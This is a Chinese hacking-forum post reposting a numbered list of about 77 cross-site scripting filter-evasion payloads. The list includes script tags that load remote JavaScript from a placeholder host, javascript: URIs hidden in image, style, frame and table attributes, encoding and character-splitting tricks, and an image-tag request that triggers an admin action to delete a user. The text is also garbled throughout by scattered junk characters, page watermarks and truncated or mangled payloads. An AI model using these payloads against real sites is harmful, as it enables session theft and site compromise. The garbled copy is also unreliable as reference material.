貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
7 N8 n, b# _. m/ F2 x(1)普通的XSS JavaScript注入
' w. T9 r8 n; n; ?2 N<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( I/ h5 C" C# r1 d9 R7 x% R8 ](2)IMG标签XSS使用JavaScript命令
/ j' I' W8 b- w- B<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 [1 ?$ W, y% N7 y1 T# K9 R
(3)IMG标签无分号无引号
5 Z/ ^, _6 X/ C- N( u2 W; J0 x! R<IMG SRC=javascript:alert(‘XSS’)>4 e2 r: c. G9 D0 s' v$ y% k- W
(4)IMG标签大小写不敏感
' v; C+ V5 H! F8 Y0 L) q7 C<IMG SRC=JaVaScRiPt:alert(‘XSS’)>1 G: e5 u4 K( b8 m
(5)HTML编码(必须有分号)& m7 r3 R3 J$ J( ?' W+ p# H
<IMG SRC=javascript:alert(“XSS”)>! t- _& `0 Q0 C
(6)修正缺陷IMG标签
6 p7 F, Q, x4 v$ G% N% N+ D E<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
7 a9 f; g9 q% r) d8 p& D
O7 X$ ~( Q8 d+ j/ p
) w) ]- M) C- m: P* b* w(7)formCharCode标签(计算器)
0 X" U/ `2 Z1 b7 V& E( I<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>! y) [5 F- x9 V
(8)UTF-8的Unicode编码(计算器)' ] i! ^9 |: Y/ j
<IMG SRC=jav..省略..S')>1 A; C* B y/ s% X5 B& b1 z; e
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)0 W3 ^* z4 U1 m
<IMG SRC=jav..省略..S')>
2 P% P5 Q1 N4 ]: K+ e) a2 ](10)十六进制编码也是没有分号(计算器)* V+ H( G0 j( g" ?* E0 N0 d
<IMG SRC=java..省略..XSS')>
6 B, V/ i" a0 K- F# E(11)嵌入式标签,将Javascript分开
; Z, x& _; I( B' X; j<IMG SRC=”jav ascript:alert(‘XSS’);”>, K' d3 R# o: O
(12)嵌入式编码标签,将Javascript分开! Y# s+ R, G- Q7 z9 F- \: N' O) E
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ T7 R: ]: h0 \& D0 y& f. v0 K- r(13)嵌入式换行符- n; G. ?0 |$ g8 ^+ M
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- p# X- Y- N# v: J% {6 s(14)嵌入式回车
& A# L4 U0 `9 d6 I5 L- Q- {! V<IMG SRC=”jav ascript:alert(‘XSS’);”># |# z5 K9 o" ]* z$ E
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 N j1 S& M3 T: E) Z<IMG SRC=”javascript:alert(‘XSS‘)”>7 v3 g; |% ^8 P5 e! }$ u" F
(16)解决限制字符(要求同页面)0 \/ Z( S( n, `( c! w! i2 h( O
<script>z=’document.’</script>9 i$ Z4 ]. v1 }( k8 ]' j
<script>z=z+’write(“‘</script>1 E7 `4 z( Z' o6 }' ?
<script>z=z+’<script’</script>6 r* H8 a% e0 ], e; S
<script>z=z+’ src=ht’</script>: N/ _5 _: Z2 b2 q7 J! G% ]$ ]
<script>z=z+’tp://ww’</script>
7 o8 U4 b+ z7 {2 `<script>z=z+’w.shell’</script>; c5 e7 M% ~% N" w; V& b
<script>z=z+’.net/1.’</script>$ S3 J! U! l# Y% n" l
<script>z=z+’js></sc’</script>- ? b. q9 ]5 V, t. W8 h+ j
<script>z=z+’ript>”)’</script>. \6 _1 `& b1 o3 w
<script>eval_r(z)</script>8 b8 o$ Z) Z2 V8 e0 b: K
(17)空字符12-7-1 T00LS - Powered by Discuz! Board$ `7 `$ h$ r0 H: z6 r
https://www.t00ls.net/viewthread ... table&tid=15267 2/67 z; \1 t# ~: y0 N( l8 |* @7 l1 b1 f
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out) ]. m s1 F6 ]8 |
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用9 E1 j# e; t5 Q6 V: b9 O
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
( J! ]; H2 H5 g3 x* x+ A+ [(19)Spaces和meta前的IMG标签
2 t+ f: d, p! k7 p( e<IMG SRC=” javascript:alert(‘XSS’);”>+ c# E6 c4 T# r" u+ A2 p
(20)Non-alpha-non-digit XSS/ x! R$ Q' U3 a' I( {
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 H7 G- v' `4 ^, ~(21)Non-alpha-non-digit XSS to 2
5 y8 m; O& ]5 N5 m$ L$ n! Q% l<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
. K( U, F1 b+ [(22)Non-alpha-non-digit XSS to 3! K4 c: G2 u* j. x" h: A5 p
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% k8 V. T, K! T* ?9 ]4 T- S8 v
(23)双开括号/ ~/ f7 \+ ^% [; ~8 C6 y
<<SCRIPT>alert(“XSS”);//<</SCRIPT>- n$ n& V( S% W- }4 m- {( f0 c
(24)无结束脚本标记(仅火狐等浏览器); p+ h5 s, z0 k$ e
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>9 }: q* g" t+ I( C3 J9 W1 k4 J
(25)无结束脚本标记2; o7 T0 p7 b1 u" x4 N2 T
<SCRIPT SRC=//3w.org/XSS/xss.js>
# }- T! [7 O4 N$ E7 @# A$ y# I! O+ v: O(26)半开的HTML/JavaScript XSS
4 m8 K9 \' m1 n$ N# O4 T; o<IMG SRC=”javascript:alert(‘XSS’)”8 j$ _4 O {4 T) g
(27)双开角括号- f, k. W4 v% u1 s1 U& Y
<iframe src=http://3w.org/XSS.html <% a) z1 u2 {8 V; _ G" `
(28)无单引号 双引号 分号
) [, @- ^$ x9 I* ~+ x! w1 |<SCRIPT>a=/XSS/
h) i4 C/ E3 b: C, Jalert(a.source)</SCRIPT>4 N3 V9 `- c# z" h' _
(29)换码过滤的JavaScript3 B/ V2 V" o F1 ]
\”;alert(‘XSS’);//
4 \) ]" h- l) U' A/ x+ S- _/ r(30)结束Title标签 R/ E& U+ G2 a. d" G
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
2 U" {6 b) J0 e! R6 r; d(31)Input Image
! g; M3 b) {7 k1 M<INPUT SRC=”javascript:alert(‘XSS’);”>3 U* B- e9 D* S6 {. i
(32)BODY Image
7 N9 `9 s( N2 x8 \- w<BODY BACKGROUND=”javascript:alert(‘XSS’)”>/ w6 T. I) ?+ r* H! ^
(33)BODY标签0 Z3 S( g2 H+ S7 l8 k6 V
<BODY(‘XSS’)>
8 ]- t/ |- n4 Z6 {(34)IMG Dynsrc
3 n2 ^* O# C' N* n+ e<IMG DYNSRC=”javascript:alert(‘XSS’)”>2 ~7 s( S2 z+ `, r S$ M' P" y& `8 l
(35)IMG Lowsrc
( f& Z! Y1 n9 n: R& `<IMG LOWSRC=”javascript:alert(‘XSS’)”>
# w. A) \9 ]' Y: A$ w(36)BGSOUND
; t/ p$ p, ^, A9 e# }, ?<BGSOUND SRC=”javascript:alert(‘XSS’);”>, w o1 S. v2 R9 A. s: Z0 R- ^
(37)STYLE sheet8 _$ T9 y5 q ^" e
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
, x5 B+ Z) Y' B+ q(38)远程样式表 K5 q: V+ y1 S8 N
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
9 O+ D( y B. {( i( [; d/ H(39)List-style-image(列表式)! Q% a% `, |! @# t* f
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS" _% C. j% T; S8 r
(40)IMG VBscript9 q1 R$ _& e) G/ F$ W
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
7 ^, p4 V3 K+ H4 G. o" T; q(41)META链接url) w" l1 ]1 J( i0 [; z
' ?+ O7 [; f( d3 S; |
! \5 e8 q1 N% `3 J7 b. L<META HTTP-EQUIV=”refresh” CONTENT=”0;
0 X; W% }; V2 E3 Y" L% ~3 P0 eURL=http://;URL=javascript:alert(‘XSS’);”>
& J5 j, ~* T g5 f8 y: {4 I2 s(42)Iframe
7 L* K2 ~5 [5 s& k<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
! ~8 A8 @3 z `1 D& a8 q$ X' x4 y(43)Frame
- T- k1 j# C. y0 ?% s1 o4 C<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board+ }1 p9 o# z1 `) r. g' s
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
- q2 P) {8 P+ T(44)Table
8 _8 f0 S* N9 p) L, B0 ?<TABLE BACKGROUND=”javascript:alert(‘XSS’)”># [. T! Z$ W( Y) N, O
(45)TD
% D# C% l6 p* G& h$ S' t<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>. ?- ?+ J- a" Z8 }
(46)DIV background-image
$ G" T) L# c5 k7 Z. A+ a& F; M<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> G% B& A5 w2 |& d: ^" w# l
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-' H' O$ y% R4 }$ Z
8&13&12288&65279) }% ~. O+ @. O" p( O. x, i
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
{+ ~" x$ u/ e- b& N/ m( @(48)DIV expression' y# F+ x# e8 Z G; @# c( C* _
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
. C/ ~& S) \. x- B% _0 L1 B* ](49)STYLE属性分拆表达9 `8 N: f7 R7 `' U5 C. n
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>( i0 @/ F4 D9 e* T; x5 O+ |
(50)匿名STYLE(组成:开角号和一个字母开头)
+ S" b" j) ]$ E! [- i5 u7 @7 C<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
$ L3 d ?/ n. A(51)STYLE background-image N+ ? n3 U2 l* [
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A) h% \2 J6 E% _; \2 u
CLASS=XSS></A>
: q2 ], @( a, b* C. z3 b8 V' p1 [# U(52)IMG STYLE方式 i1 f8 j0 l4 {) M" p
exppression(alert(“XSS”))’>& Q5 d: ~ x! _2 W9 m
(53)STYLE background
- q. Z. K F3 e8 v7 X2 m<STYLE><STYLE( m& p/ y8 Q" v" Y G% o2 E
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
% @- ^( l& L9 U! P/ i(54)BASE% w# D- F% u* Q, `. ^6 E
<BASE HREF=”javascript:alert(‘XSS’);//”>
* h1 D5 c, @+ J; s8 I0 `3 ^6 A* y(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS! @ y, d( F, Q& m5 I
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>7 [! D" O0 Y% h& c
(56)在flash中使用ActionScrpt可以混进你XSS的代码1 p. p8 i- x6 D# v* D
a=”get”;
5 D! G& m" O9 _$ y6 r& q' O. E* `+ Db=”URL(\”";: z: i8 \3 E9 m* n5 t
c=”javascript:”;) }' d- P# p) c' g$ H( q
d=”alert(‘XSS’);\”)”;. e6 j0 X8 R( ]/ p4 [6 ~
eval_r(a+b+c+d);
3 g" k1 X( ?) Y7 V(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
; ^1 A+ f* M! S' Y<HTML xmlns:xss>( i# l n0 c- ]
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>8 v2 y: N* L+ N5 {
<xss:xss>XSS</xss:xss>4 ?5 v9 ]) E1 S" u2 v6 Y' k
</HTML># o' ]3 |8 r% k
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
! F, E$ ^. K6 [<SCRIPT SRC=””></SCRIPT>- A* C) j/ n! w0 m8 m
(59)IMG嵌入式命令,可执行任意命令
2 K6 I) z: X5 e( K<IMG SRC=”http://www.XXX.com/a.php?a=b”>* M' }5 Z# V/ H, T& w' d. u$ m0 T
(60)IMG嵌入式命令(a.jpg在同服务器)' X, \) t& G; M- t- q9 z
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
( M f, ]. {! U3 T+ @(61)绕符号过滤
E! \' E# w" Q" ^! o4 n+ w<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
6 R. [ T8 C2 y+ k. k9 N(62)9 b+ l4 e/ p) W3 @6 m
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>: D( r) J" o, `
(63)& `$ o: L& W/ _' O1 p
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>( a; c; Q% e2 |3 Q
(64)5 Y- s8 F" R+ N6 o
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
2 m: t! v4 m" a8 g2 d(65)
8 L2 l, V8 r0 i% v& {" D<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>+ i9 @2 h9 R$ S% s! Y. X
(66)12-7-1 T00LS - Powered by Discuz! Board0 r1 C5 |2 [5 e9 I$ a
https://www.t00ls.net/viewthread ... table&tid=15267 4/6! a& c$ j3 ^8 G
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>( n: \* l9 f& K1 m
(67)
9 t& z6 a( K4 }6 y& e; |<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>/ Z2 ^3 o; S+ b
</SCRIPT>
" o9 v3 J3 A, K' `1 T- _(68)URL绕行
m9 M$ x/ Z T G6 S- e9 P c" b2 e9 U$ ?<A HREF=”http://127.0.0.1/”>XSS</A>
# ?! g5 ? P( |$ t(69)URL编码0 y: J$ {) k4 l H. V
<A HREF=”http://3w.org”>XSS</A>+ g& ]$ q) K, B* T; j& h0 @
(70)IP十进制
" q" l7 J. Y5 y: h, y<A HREF=”http://3232235521″>XSS</A>
$ F4 B+ P& }3 g6 n ` q+ Y0 N0 c(71)IP十六进制8 u6 V) E0 \% Q- A5 a! H( Y
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>) B- h, h+ M: X; U$ {5 J
(72)IP八进制0 i& B0 T( G' Z: G2 S' a2 C
<A HREF=”http://0300.0250.0000.0001″>XSS</A>0 ]: F' t# x2 }
(73)混合编码
- A+ S: u* Y8 f0 H; B<A HREF=”h! ]$ B K$ g3 }' |
tt p://6 6.000146.0×7.147/”">XSS</A>4 M9 `/ l2 v/ s% }' T0 t( w* S
(74)节省[http:]
8 M# u1 [; p$ ~6 c) ?$ n& M9 g6 D<A HREF=”//www.google.com/”>XSS</A>
6 g9 k0 ?8 t$ ^(75)节省[www]
4 B) {; y" `! D$ P<A HREF=”http://google.com/”>XSS</A>
0 F1 p% J+ b/ C K. F, \) L% @(76)绝对点绝对DNS
, Y1 k* D O, a0 A+ [% t, ?' ^<A HREF=”http://www.google.com./”>XSS</A>) \. h* T% L5 z) M! G4 Q! I
(77)javascript链接9 Y5 a2 |+ j6 U9 T
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
4 t2 u; S) {& G! k3 Q# J7 L( i" a5 A7 ?# T
原文地址:http://fuzzexp.org/u/0day/?p=144 Z+ T( `; V: ]/ m
D7 K% {& A8 k |
发表于 2013-4-19 19:22:37
收藏
支持
反对